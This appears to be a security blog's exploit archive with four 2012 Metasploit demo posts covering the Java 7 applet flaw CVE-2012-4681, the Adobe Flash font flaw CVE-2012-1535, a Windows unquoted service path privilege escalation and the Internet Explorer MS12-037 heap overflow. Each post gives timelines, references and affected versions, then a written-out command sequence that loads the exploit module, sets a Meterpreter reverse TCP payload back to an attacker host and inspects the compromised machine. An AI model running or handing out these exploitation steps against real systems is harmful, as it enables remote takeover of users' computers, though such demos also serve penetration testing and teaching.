Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to ZDI by James Forshaw (tyranid)
Vulnerability reported to the vendor by ZDI the 2012-07-24.
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability the 2012-08-26
Source code of the vulnerability provided by jduck the 2012-08-26
Metasploit PoC provided the 2012-08-27
Patched through out-of-band Oracle Security Alert for CVE-2012-4681 the 2012-08-30.

PoC provided by :

Unknown
jduck
sinn3r
juan vazquez

Reference(s) :

CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation
ZDI-12-197
Oracle Security Alert for CVE-2012-4681

Affected version(s) :

Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.

Tested on Windows XP Pro SP3 & Ubuntu 12.04 with :

Internet Explorer 8 & Firefox 14.0.1 & Chrome
Oracle JSE 1.7.0_06-b24

Description :

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Commands :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows 0day exploitation with Internet Explorer, Firefox and chrome :

Linux Ubuntu 12.04 exploitation with Firefox :

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor the 2012-08-14
Metasploit PoC provided the 2012-08-17

PoC provided by :

Alexander Gavrun
juan vazquez
sinn3r

Reference(s) :

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s) :

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome earlier version 21.0.1180.79.

Tested on Windows 7 Integral with :

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows Service Trusted Path Privilege Escalation Vulnerability Metasploit Demo

Exploits, Metasploit

Timeline :

Metasploit PoC provided the 2012-08-14

PoC provided by :

sinn3r

Reference(s) :

None

Affected version(s) :

All Microsoft Windows with applications having unexpected paths

Tested on Windows XP Pro SP3 with :

OpenVPN 2.1.1

Description :

This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Security” on page 676.

Commands :

You need a valid session on the target for example with :

exploit/windows/browser/ms12_037_same_id

Then execute the following exploit to detect vulnerable services

use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
set LPORT 4443
exploit

sysinfo
getuid

MS12-037 Internet Explorer CVE-2012-1876 Vulnerability Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2012-03-14
Public release of the vulnerability the 2012-06-12
Details of the vulnerability provided by VUPEN the 2012-07-10
Metasploit PoC provided the 2012-07-31

PoC provided by :

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.

Commands :

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid